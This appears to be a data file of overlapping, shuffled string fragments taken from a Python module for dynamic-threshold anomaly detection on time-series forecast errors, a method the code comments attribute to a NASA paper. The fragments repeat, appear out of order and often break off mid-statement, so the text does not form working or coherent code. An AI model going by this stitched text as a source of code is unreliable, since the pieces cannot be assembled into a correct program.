"= [(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]] #",
"epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values are anomalies",
"abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return",
"for error_seq in e_seq: if i >= error_seq[0] and i <= error_seq[1]: pruned_indices.append(i)",
"compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices",
"smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window = i - historical_error_window",
"residuals. Smoothed if specified by user. \"\"\" errors = [abs(y_h - y_t) for",
"zip(y_hat, y_true)] if not smoothed: return errors historical_error_window = int(window_size * batch_size *",
"[(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]] # generate",
"np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The treshold",
"save to compute delta mean and delta std # these are important for",
"= (window_size * batch_size) + (i * batch_size) if i == num_windows +",
"epsilon # sd_threshold can be multiplied by sigma to get epsilon return max_epsilon,",
"% (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices",
"(i + j) < len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not",
"errors should be smoothed with EWMA. Returns: (list): error residuals. Smoothed if specified",
"= np.std(smoothed_errors) epsilon = mu + (z * sigma) # compare to epsilon",
"anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i + j) if (i -",
"for g in groups if not g[0] == g[-1]] mean_perc_decrease = (mu -",
"[] max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or",
"j) not in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i - j)",
"\"\"\" Calculates the forecasting error for two arrays of data. If smoothed errors",
"important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values",
"arrays of data. If smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted",
"mit import numpy as np # Methods to do dynamic error thresholding on",
"sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer",
"each sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) +",
"0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05",
"(i - j) not in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i",
"y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool):",
"extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true",
"sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true,",
"def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95,",
"if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if i not in",
"data. If smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true).",
"= 100 # have a cutoff value for anomalies until model is trained",
"window_size)) / batch_size) anomalies_indices = [] for i in range(num_windows + 1): prev_index",
"(%s) larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size",
"anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices)))",
"max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which don't meet a minimum",
"if e < epsilon: # save to compute delta mean and delta std",
"np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) #",
"return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that",
"pruned_indices = [] for i in anomaly_indices: for error_seq in e_seq: if i",
"removes anomalies which don't meet a minimum separation from next anomaly. \"\"\" #",
"- (batch_size * window_size)) / batch_size) anomalies_indices = [] for i in range(num_windows",
"batch_size) anomalies_indices = [] for i in range(num_windows + 1): prev_index = i",
"minimum_index: anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors) and (i -",
"for i in anomaly_indices: for error_seq in e_seq: if i >= error_seq[0] and",
"from the errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer",
"len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta",
"np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100 # have",
"0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue # generate sequences above_epsilon",
"decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max =",
"until model is trained enough anomaly_indices = [] max_error_below_e = 0 for i",
"* batch_size) if i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors =",
"e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies(",
"Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates",
"= int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices = [] for i",
"smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true ():",
"= sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1])",
"the forecasting error for two arrays of data. If smoothed errors desired, runs",
"sigma = np.std(smoothed_errors) epsilon = mu + (z * sigma) # compare to",
"anomaly continue for j in range(error_buffer): if (i + j) < len(smoothed_errors) and",
"anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors) and (i - j)",
"these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: #",
"< len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not in above_epsilon and",
"[], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]]",
"> minimum_index: anomaly_indices.append(i - j) # get all the errors that are below",
"for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon: # save",
"in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups if g[0] !=",
"curr_index = (window_size * batch_size) + (i * batch_size) if i == num_windows",
"errors desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true",
"anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z",
"two arrays of data. If smoothed errors desired, runs EWMA. Args: y_hat (list):",
"values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float):",
"+ j) not in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i +",
"== g[-1]] # generate \"scores\" for anomalies based on the max distance from",
"(bool): whether the returned errors should be smoothed with EWMA. Returns: (list): error",
"sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove =",
"np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0],",
"e > epsilon: # above_epsilon values are anomalies for j in range(0, error_buffer):",
"- historical_error_window right_window = i + historical_error_window + 1 if left_window < 0:",
"based on the max distance from epsilon for each sequence anomalies_scores = []",
"sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies,",
"moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from",
"- epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences,",
"z) below_epsilon, below_indices, above_epsilon = [], [], [] for i in range(len(smoothed_errors)): e",
"smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies,",
"/\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've seen so far",
"len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies",
"delta mean and delta std # these are important for epsilon calculation below_epsilon.append(e)",
"smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if i not in anomaly_indices:",
"dynamically by testing multiple Zs. # z is drawn from an ordered set",
"= len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer)",
"g[-1]) for g in groups if not g[0] == g[-1]] mean_perc_decrease = (mu",
"mean and delta std # these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i)",
"= smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if perc_change",
"method that removes anomalies which don't meet a minimum separation from next anomaly.",
"for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if",
"# generate \"scores\" for anomalies based on the max distance from epsilon for",
"for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors)",
"delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True):",
"paper but # wasn't referenced in the paper # we get the inverse",
"+ inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices]) # group",
"max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30):",
"[] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([",
"# update the largest epsilon we've seen so far if epsilon > max_epsilon:",
"continue for j in range(error_buffer): if (i + j) < len(smoothed_errors) and (i",
"groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e,",
"separation from next anomaly. \"\"\" # min accepted perc decrease btwn max errors",
"minimum separation from next anomaly. \"\"\" # min accepted perc decrease btwn max",
"than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size))",
"# get anomalies from inverse of smoothed errors # This was done in",
"the # number of standard deviations above mean(smoothed_errors) # here we iterate in",
"\"\"\" Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors)",
"(): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true)",
"range(len(smoothed_errors)): adjusted_index = i + (window - 1) * batch_size if smoothed_errors[i] >",
"/ smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del",
"len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned errors",
"the inverse by flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu",
"+ (sigma * z) below_epsilon, below_indices, above_epsilon = [], [], [] for i",
"epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range",
"inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices",
"indices_remove = [] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1:",
"+ 1] perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for",
"values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned",
"group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences",
"Methods to do dynamic error thresholding on timeseries data # Implementation inspired by:",
"Calculates the forecasting error for two arrays of data. If smoothed errors desired,",
"5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100 # have a cutoff",
"np # Methods to do dynamic error thresholding on timeseries data # Implementation",
"0.5): epsilon = mu + (sigma * z) below_epsilon, below_indices, above_epsilon = [],",
"Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon",
"which # weren't identified as anomalies to process them for i in range(len(smoothed_errors)):",
"* window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size, len(y_true)))",
"# above_epsilon values are anomalies for j in range(0, error_buffer): if (i +",
"g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\"",
"batch_size) if i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index]",
"window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from inverse of smoothed",
"is determined dynamically by testing multiple Zs. # z is drawn from an",
"for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors))",
"the errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int):",
"in e_seq: if i >= error_seq[0] and i <= error_seq[1]: pruned_indices.append(i) return pruned_indices",
"- lower_percentile minimum_index = 100 # have a cutoff value for anomalies until",
"= [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)] if not smoothed:",
"in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if",
"and (i - j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0:",
"error for two arrays of data. If smoothed errors desired, runs EWMA. Args:",
"= int(window_size * batch_size * smoothing_percent) moving_avg = [] for i in range(len(errors)):",
"to do dynamic error thresholding on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf",
"groups if not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu",
"desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values.",
"set of positive values representing the # number of standard deviations above mean(smoothed_errors)",
"sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for",
"in range(len(smoothed_errors)): adjusted_index = i + (window - 1) * batch_size if smoothed_errors[i]",
"or smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly continue for j",
"larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size *",
"paper found to be good for z in np.arange(2.5, sd_limit, 0.5): epsilon =",
"from next anomaly. \"\"\" # min accepted perc decrease btwn max errors in",
">= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue # generate sequences",
"on the max distance from epsilon for each sequence anomalies_scores = [] for",
"and adjusted_index not in all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i]",
"range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i +",
"deviations above mean(smoothed_errors) # here we iterate in increments of 0.5 on the",
"sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\"",
"if (i + j) > minimum_index: anomaly_indices.append(i + j) if (i - j)",
"on the range that the NASA paper found to be good for z",
"i in range(len(smoothed_errors)): adjusted_index = i + (window - 1) * batch_size if",
"group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices",
"not g[0] == g[-1]] # generate \"scores\" for anomalies based on the max",
"# group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)]",
"y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if",
"+ j) < len(smoothed_errors) and (i + j) not in anomaly_indices: if (i",
"]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies`",
"which don't meet a minimum separation from next anomaly. \"\"\" # min accepted",
"whether the returned errors should be smoothed with EWMA. Returns: (list): error residuals.",
"return errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg = [] for",
"drawn from an ordered set of positive values representing the # number of",
"= mu + (sigma * z) below_epsilon, below_indices, above_epsilon = [], [], []",
"= group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0:",
"+ (z * sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies(",
"upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index =",
"i + (window - 1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index",
"not in all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group",
"max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if i",
"compute delta mean and delta std # these are important for epsilon calculation",
"* sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon,",
"smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly continue for j in",
"= 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]])",
"that removes anomalies which don't meet a minimum separation from next anomaly. \"\"\"",
"smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <=",
"paper # we get the inverse by flipping around the mean mu =",
"below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values are anomalies for j",
"if len(above_epsilon) == 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups =",
"(i + j) not in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i",
"anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile,",
"y_h, y_t in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window = int(window_size",
"perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max",
"is trained enough anomaly_indices = [] max_error_below_e = 0 for i in range(len(smoothed_errors)):",
"the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for",
"enough anomaly_indices = [] max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i]",
"x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0):",
"get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\"",
"next anomaly. \"\"\" # min accepted perc decrease btwn max errors in anomalous",
"in groups if not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) /",
"anomalies which don't meet a minimum separation from next anomaly. \"\"\" # min",
"epsilon: # save to compute delta mean and delta std # these are",
"max([ abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score)",
"in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i + j) if (i",
"historical_error_window right_window = i + historical_error_window + 1 if left_window < 0: left_window",
"and delta std # these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if",
"error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile",
"mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not g[0] ==",
"1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i]",
"= compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer )",
"historical_error_window + 1 if left_window < 0: left_window = 0 if right_window >",
"max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i]",
"for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 *",
"wasn't referenced in the paper # we get the inverse by flipping around",
"(i - j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue",
"= [(g[0], g[-1]) for g in groups if g[0] != g[-1]] return e_seq,",
"forecasted values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent",
"# This was done in the implementation of NASA paper but # wasn't",
"for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([ abs(smoothed_errors[x]",
"len(above_epsilon)) # update the largest epsilon we've seen so far if epsilon >",
"[list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups",
"i, anomalies_indices, error_buffer ) # get anomalies from inverse of smoothed errors #",
"(int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned errors should be",
"sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from inverse of smoothed errors",
"number of standard deviations above mean(smoothed_errors) # here we iterate in increments of",
"g in groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq,",
"delta std # these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e",
"e < epsilon: # save to compute delta mean and delta std #",
"not in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i - j) #",
"anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0],",
"std # these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e >",
"= len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts",
"the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon",
"mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z * sigma)",
"len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer):",
"anomalies_indices, error_buffer ) # get anomalies from inverse of smoothed errors # This",
"anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies",
"sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors)",
"epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest",
"# sd_threshold can be multiplied by sigma to get epsilon return max_epsilon, sd_threshold",
"weren't identified as anomalies to process them for i in range(len(smoothed_errors)): adjusted_index =",
"ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true)",
"window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true,",
"window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies",
"inverse of smoothed errors # This was done in the implementation of NASA",
"for g in anomalies_groups if not g[0] == g[-1]] # generate \"scores\" for",
"not an anomaly continue for j in range(error_buffer): if (i + j) <",
"# compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer,",
"if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1]",
"i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range:",
"referenced in the paper # we get the inverse by flipping around the",
"below_indices.append(i) if e > epsilon: # above_epsilon values are anomalies for j in",
"anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices + inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size",
"def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which don't",
"smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list):",
"by flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu",
"batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index",
"are below epsilon and which # weren't identified as anomalies to process them",
"> max_error_below_e and adjusted_index not in all_anomalies: if i not in anomaly_indices: max_error_below_e",
"(mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've",
"delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if",
"if epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon # sd_threshold can",
"> epsilon: # above_epsilon values are anomalies for j in range(0, error_buffer): if",
"(window_size * batch_size) + (i * batch_size) if i == num_windows + 1:",
"(int): Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s)",
"0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max)",
"to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer):",
"into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)]",
"model is trained enough anomaly_indices = [] max_error_below_e = 0 for i in",
"[(g[0], g[-1]) for g in groups if not g[0] == g[-1]] mean_perc_decrease =",
"= [] for i in range(len(errors)): left_window = i - historical_error_window right_window =",
"epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices,",
") if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices )",
"e_seq[index] pruned_indices = [] for i in anomaly_indices: for error_seq in e_seq: if",
"range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range: # not",
"len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0:",
"smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which don't meet a",
"* z) below_epsilon, below_indices, above_epsilon = [], [], [] for i in range(len(smoothed_errors)):",
"continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq",
"< 0: left_window = 0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window]))",
"sorted(indices_remove, reverse=True): del e_seq[index] pruned_indices = [] for i in anomaly_indices: for error_seq",
"epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores",
"= [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score =",
"epsilon for each sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator =",
"more_itertools as mit import numpy as np # Methods to do dynamic error",
"If smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true",
"1 if left_window < 0: left_window = 0 if right_window > len(errors): right_window",
"(len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size)",
"= np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The",
"(sigma * z) below_epsilon, below_indices, above_epsilon = [], [], [] for i in",
"lower_percentile minimum_index = 100 # have a cutoff value for anomalies until model",
"to compute delta mean and delta std # these are important for epsilon",
"anomaly_indices = [] max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <=",
"above_epsilon and (i - j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) ==",
